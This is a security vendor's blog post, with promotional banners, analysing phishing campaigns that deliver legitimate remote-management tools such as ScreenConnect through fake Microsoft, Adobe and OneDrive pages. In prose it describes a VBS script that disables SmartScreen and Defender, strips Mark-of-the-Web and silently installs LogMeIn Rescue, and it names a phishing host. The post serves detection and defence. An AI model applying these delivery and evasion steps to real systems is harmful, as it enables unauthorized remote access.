<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/">Phishing-to-RMM Attacks: The Remote Access Blind Spot CISOs Can’t Ignore </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>CISOs are under pressure to prove that their security programs can detect threats early, reduce business risk, and support fast, confident response. But that becomes harder when attackers stop relying on obviously malicious tools.</p>



<p>In recent phishing-to-RMM campaigns observed by <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> analysts, threat actors are using fake Microsoft, Adobe, and OneDrive pages to deliver legitimate remote management tools instead of traditional malware. Once installed, these tools can give attackers remote access to a victim’s device while blending into software categories many enterprises already use or allow.</p>



<p>For security leaders, this creates a difficult visibility problem. The payload may be legitimate. The infrastructure may be trusted. The user action may look like a routine download. Yet the outcome is the same: unauthorized remote access inside the environment.</p>



<h2 class="wp-block-heading">Key&nbsp;Takeaways&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Phishing-to-RMM attacks create a dangerous visibility gap for enterprise SOCs: </strong>Attackers can deliver legitimate remote management tools through phishing pages that impersonate trusted services like Microsoft, Adobe, and OneDrive.</li>
</ul>



<ul class="wp-block-list">
<li><strong>The payload may not look malicious on its own: </strong>Tools such as ScreenConnect and LogMeIn Rescue can appear as legitimate remote administration software, especially in organizations where RMM usage is already allowed.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Domain reputation is not enough: </strong>These attacks may use legitimate platforms, vendor infrastructure, or compromised websites instead of obvious newly registered domains.</li>
</ul>



<ul class="wp-block-list">
<li><strong>The real signal is in the full attack chain: </strong>SOC teams need to connect the phishing lure, download context, execution behavior, RMM installation, and outbound connections.</li>
</ul>



<ul class="wp-block-list">
<li><strong>For CISOs, the risk is operational as much as technical: </strong>Missed phishing-to-RMM activity can lead to slower detection, longer attacker dwell time, delayed containment, and weaker confidence in approved remote access tools.</li>
</ul>



<ul class="wp-block-list">
<li><strong>ANY.RUN helps turn gray-zone activity into evidence: </strong>With <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>, teams can safely analyze suspicious URLs and files, trace RMM behavior, and investigate related phishing-to-RMM chains.</li>
</ul>



<h2 class="wp-block-heading">The Blind Spot: When “Allowed” Tools Become the Attack Path</h2>



<p>Most enterprise security programs are built to separate malicious activity from normal operations. Phishing-to-RMM attacks blur that line.</p>



<p>An RMM installer can pass basic checks because it is not malware by design. But the risk is not in the tool alone. It is in the context around it: how it reached the user, whether the download was expected, which endpoint launched it, and what connection followed.</p>



<p>For CISOs, this is where the risk becomes critical. Unauthorized access can hide inside routine-looking activity, giving the business a false sense of control while the attacker is already inside.</p>



<p>The&nbsp;outcome&nbsp;can&nbsp;be&nbsp;serious:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Slower detection</strong> because the activity does not look like classic malware </li>



<li><strong>Longer attacker dwell time</strong> inside the environment </li>



<li><strong>Higher risk of lateral movement </strong>from the compromised endpoint </li>



<li><strong>More pressure</strong> on SOC teams to investigate ambiguous alerts </li>



<li><strong>Delayed containment</strong> because the initial access path is harder to prove </li>



<li><strong>Weaker confidence</strong> in whether approved remote access tools are being used safely </li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close the gap before it becomes business risk. <br>
<span class="highlight">Give your SOC full visibility into suspicious activity.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rmm-blind-spot &#038;utm_term=280426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Which&nbsp;Organizations&nbsp;are&nbsp;Most&nbsp;Exposed&nbsp;</h2>



<p>ANY.RUN data shows that phishing-to-RMM activity is primarily concentrated in the <strong>United States</strong>, followed by <strong>Canada, Europe, and Australia</strong>. The most affected industries include Education, Technology, Banking, Government, Manufacturing, and Finance.</p>



<p>These sectors often depend on remote administration for IT support, distributed workforce management, and endpoint maintenance. That reliance creates more room for abuse: when RMM tools are already part of normal operations, unauthorized access can take longer to recognize and contain.</p>



<h2 class="wp-block-heading">How&nbsp;Legitimate&nbsp;RMM Tools&nbsp;Are&nbsp;Delivered&nbsp;Through&nbsp;Phishing&nbsp;</h2>



<p>Since&nbsp;early April, the ANY.RUN team has&nbsp;observed&nbsp;a rise in phishing-to-RMM attacks, where threat actors use phishing to deliver legitimate remote management tools and gain remote access to victims’ devices.&nbsp;&nbsp;</p>



<p>For just one of these campaigns, we are seeing more than 50 public analyses in ANY.RUN every week: <a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookup#{%22query%22:%22suricataID:%5C%2284002229%5C%22%22,%22dateRange%22:7}" target="_blank" rel="noreferrer noopener">suricataID:&#8221;84002229&#8243;</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="553" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-1024x553.png" alt="Public analyses related to phishing-to-RMM attacks demonstrated inside ANY.RUN’s TI Lookup" class="wp-image-20549" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-1024x553.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-768x415.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-1536x829.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-2048x1106.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/imageb-1-740x400.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Public analyses related to&nbsp;phishing-to-RMM attacks&nbsp;demonstrated&nbsp;inside ANY.RUN’s TI Lookup</em></figcaption></figure></div>


<p>Phishing campaigns that deliver RMM tools are especially dangerous for SOC teams because these tools can appear to be legitimate remote administration software. If an organization already uses or allows RMM solutions, the launch of <strong>ScreenConnect</strong> may not immediately trigger security policies.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Close the RMM abuse gap in your SOC. <br>
<span class="highlight">Integrate ANY.RUN’s threat analysis and intelligence.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rmm-blind-spot &#038;utm_term=280426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>The screenshot below shows a phishing page impersonating <strong>Microsoft Store</strong> and <strong>Adobe Acrobat Reader DC</strong>. The user is prompted to download <strong>Adobesetup.exe</strong>, but behind that name is ScreenConnect; an RMM tool that attackers can use to establish remote access to the system.</p>



<p><a href="https://app.any.run/tasks/e072ae4e-214c-4039-957d-7c0cbe682da8/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View&nbsp;analysis&nbsp;session</a>&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="568" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-1024x568.png" alt="A fake Microsoft Store page with an RMM installer disguised as Adobe " class="wp-image-20553" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-1024x568.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-300x167.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-768x426.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-1536x853.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-2048x1137.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-270x150.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image9-3-740x411.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A&nbsp;fake&nbsp;Microsoft Store&nbsp;page&nbsp;with&nbsp;an&nbsp;RMM&nbsp;installer&nbsp;disguised&nbsp;as&nbsp;Adobe</em>&nbsp;</figcaption></figure></div>


<p>Another example shows the attack disguised as a protected Microsoft OneDrive download. The page at vmail.app.n8n.cloud displays a <strong>“Verify to Download” </strong>prompt for what appears to be a PDF document. Once the user clicks, they receive ScreenConnect.ClientSetup.exe:</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-1024x578.png" alt="" class="wp-image-20555" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-1024x578.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-768x433.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-1536x867.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-370x209.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32-740x417.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.12.32.png 1918w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fake Microsoft&nbsp;OneDrive page&nbsp;with&nbsp;an&nbsp;RMM installer disguised as a PDF document</em>&nbsp;</figcaption></figure></div>


<p>This chain makes SOC triage more difficult: the phishing landing page is hosted on the legitimate n8n.cloud platform, while the RMM agent download and subsequent connection occur through legitimate <strong>ScreenConnect infrastructure.</strong></p>



<p>The attack does not rely on obvious newly registered domains, which are often an easy signal for blocking. As a result, detection needs to be based on behavior, download context, and anomalies around RMM execution, not domain reputation alone.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="126" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-1024x126.png" alt="Traffic to ScreenConnect in ANY.RUN’s Connections tab " class="wp-image-20557" style="width:640px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-1024x126.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-300x37.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-768x95.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-1536x189.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-370x46.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-270x33.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4-740x91.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image3-4.png 1786w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Traffic to&nbsp;ScreenConnect&nbsp;in ANY.RUN’s Connections tab</em>&nbsp;</figcaption></figure></div>


<p>In addition to ScreenConnect, threat actors use other <strong>legitimate RMM and remote-access tools</strong> in these phishing chains, including Datto RMM, ITarian, LogMeIn Rescue, Action1 RMM, NetSupport, Syncro, MeshAgent, SimpleHelp, RustDesk, and Splashtop.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="360" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-1024x360.png" alt="TI Lookup query for tracking phishing-to-RMM attack chains " class="wp-image-20558" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-1024x360.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-300x106.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-768x270.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-1536x540.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-2048x721.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-370x130.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-270x95.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image4-3-740x260.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI&nbsp;Lookup&nbsp;query&nbsp;for&nbsp;tracking&nbsp;phishing-to-RMM&nbsp;attack&nbsp;chains</em>&nbsp;</figcaption></figure></div>


<p>To retrospectively track similar chains in&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">ANY.RUN Threat Intelligence</a>, teams can use the following query.&nbsp;As part of TI Lookup, every user has&nbsp;access to 20 full queries:&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22^phishing$%5C%22%20and%20threatName:%5C%22rmm-tool%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">threatName:&#8221;^phishing$&#8221; and&nbsp;threatName:&#8221;rmm-tool&#8221;</a>&nbsp;</p>



<p>In addition to standard installers,&nbsp;threat&nbsp;actors are also using more sophisticated delivery methods, as shown in&nbsp;this public analysis:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="548" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-1024x548.png" alt="VBS document disguised as an Adobe Acrobat installer" class="wp-image-20571" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-1024x548.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-300x160.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-768x411.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-1536x821.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-370x198.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-270x144.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24-740x396.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-28-at-13.26.24.png 1608w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>VBS&nbsp;document&nbsp;disguised&nbsp;as&nbsp;an&nbsp;Adobe Acrobat&nbsp;installer</em></figcaption></figure></div>


<p>In&nbsp;this&nbsp;example,&nbsp;the&nbsp;user&nbsp;is&nbsp;shown&nbsp;a&nbsp;phishing&nbsp;page&nbsp;with&nbsp;an&nbsp;Adobe&nbsp;document&nbsp;download&nbsp;lure.&nbsp;Instead&nbsp;of&nbsp;the&nbsp;expected&nbsp;file,&nbsp;the&nbsp;page&nbsp;delivers&nbsp;a&nbsp;<strong>VBS&nbsp;script</strong>.&nbsp;</p>



<p>Once executed, the script attempts to elevate privileges through UAC, disable SmartScreen, and weaken <strong>Microsoft Defender</strong> protections. It then silently downloads the <strong>LogMeIn Rescue</strong> installer, removes the Mark-of-the-Web, and runs a quiet installation via msiexec, turning the endpoint into a system with unattended RMM access.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Detect trusted-tool abuse before attackers gain access. <br>
Bring ANY.RUN into your SOC for <span class="highlight"> faster threat response. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rmm-blind-spot &#038;utm_term=280426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate in your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>It is also worth noting that in campaigns like this, threat actors try to minimize easily blocked, lower-level IoCs from the <strong>Pyramid of Pain</strong>, such as newly registered domains.</p>



<p>Instead, phishing pages may be hosted on already existing websites. The domain itself appears legitimate, while the suspicious activity is hidden deeper in the URL — in an unusual URI path that may indicate SEO injection or a compromised website.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-1024x443.png" alt="" class="wp-image-20567" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-1024x443.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-300x130.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-768x332.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-1536x664.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-2048x886.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-370x160.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-270x117.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_2-740x320.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>SEO&nbsp;injection&nbsp;into&nbsp;a&nbsp;legitimate&nbsp;domain&nbsp;in&nbsp;a&nbsp;phishing-to-RMM&nbsp;attack&nbsp;chain&nbsp;</em></figcaption></figure></div>


<p>At&nbsp;the&nbsp;time&nbsp;of&nbsp;analysis,&nbsp;VirusTotal&nbsp;showed&nbsp;that&nbsp;no&nbsp;vendor&nbsp;had&nbsp;flagged&nbsp;this&nbsp;domain&nbsp;as&nbsp;malicious:&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="500" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-1024x500.png" alt="VirusTotal did not flag the domain as malicious at the time of analysis " class="wp-image-20566" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-1024x500.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-300x147.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-768x375.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-1536x750.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-2048x1000.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-370x181.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-270x132.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screen_1-740x361.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>VirusTotal&nbsp;did&nbsp;not&nbsp;flag&nbsp;the&nbsp;domain&nbsp;as&nbsp;malicious&nbsp;at&nbsp;the&nbsp;time&nbsp;of&nbsp;analysis</em>&nbsp;</figcaption></figure></div>


<p>Taken together, these cases reflect a broader shift from <strong>malware-first initial access</strong> to <strong>phishing-first initial access</strong>. Threat actors are increasingly gaining access not through an obviously malicious payload, but through social engineering and legitimate remote administration tools.</p>



<h2 class="wp-block-heading">How&nbsp;SOC&nbsp;Teams&nbsp;Can&nbsp;Close&nbsp;the&nbsp;RMM&nbsp;Visibility&nbsp;Gap&nbsp;</h2>



<p>Phishing-to-RMM attacks cannot be handled like ordinary malware delivery. The payload may be legitimate, the infrastructure may be trusted, and the domain may not have a malicious reputation at the time of analysis.</p>



<p>To detect this activity earlier, SOC teams need visibility into the full attack chain, not just the final file. That means connecting:</p>



<ul class="wp-block-list">
<li>the&nbsp;phishing&nbsp;page&nbsp;that&nbsp;initiated&nbsp;the&nbsp;download&nbsp;</li>



<li>the&nbsp;file&nbsp;or&nbsp;script&nbsp;delivered&nbsp;to&nbsp;the&nbsp;user&nbsp;</li>



<li>the&nbsp;execution&nbsp;path&nbsp;on&nbsp;the&nbsp;endpoint&nbsp;</li>



<li>attempts&nbsp;to&nbsp;weaken&nbsp;security&nbsp;controls&nbsp;</li>



<li>RMM&nbsp;installation&nbsp;behavior&nbsp;</li>



<li>outbound&nbsp;connections&nbsp;to&nbsp;remote&nbsp;access&nbsp;infrastructure&nbsp;</li>
</ul>



<p>This is where ANY.RUN helps teams close the gap. With the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, security teams can safely examine suspicious URLs, files, and scripts during triage.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="567" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-1024x567.png" alt="Phishing-to-RMM attack chain exposed inside ANY.RUN sandbox" class="wp-image-20562" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-1024x567.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-768x425.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-1536x850.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-2048x1133.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/screen-3-740x409.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Phishing-to-RMM&nbsp;attack&nbsp;chain&nbsp;exposed&nbsp;inside&nbsp;ANY.RUN&nbsp;sandbox</em></figcaption></figure></div>


<p>They can observe the phishing lure, delivered payload, execution flow, attempts to weaken security controls, RMM installation, and outbound connections in one controlled environment.</p>



<p>ANY.RUN <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=rmm-blind-spot&amp;utm_term=280426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> adds the retrospective layer. Teams can search across public analyses, track phishing-to-RMM chains, pivot from one indicator to related activity, and understand whether a single event is part of a wider campaign.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="553" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-1024x553.png" alt="Sandbox analyses linked to phishing-to-RMM attacks displayed inside TI Lookup " class="wp-image-20563" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-1024x553.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-300x162.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-768x415.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-1536x829.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-2048x1106.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-370x200.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/image8-740x400.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Sandbox&nbsp;analyses&nbsp;linked&nbsp;to&nbsp;phishing-to-RMM&nbsp;attacks&nbsp;displayed&nbsp;inside&nbsp;TI&nbsp;Lookup</em>&nbsp;</figcaption></figure></div>


<p>For CISOs, this means more control over a risk that is usually hard to prove. The SOC can validate suspicious remote access activity faster, show how the access path started, and give leadership clearer evidence for containment and follow-up decisions.</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Strengthen</span> early threat detection across your SOC. <br>
See suspicious activity clearly and <span class="highlight">act with confidence. <span class="highlight"> <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=rmm-blind-spot &#038;utm_term=280426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Power up your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



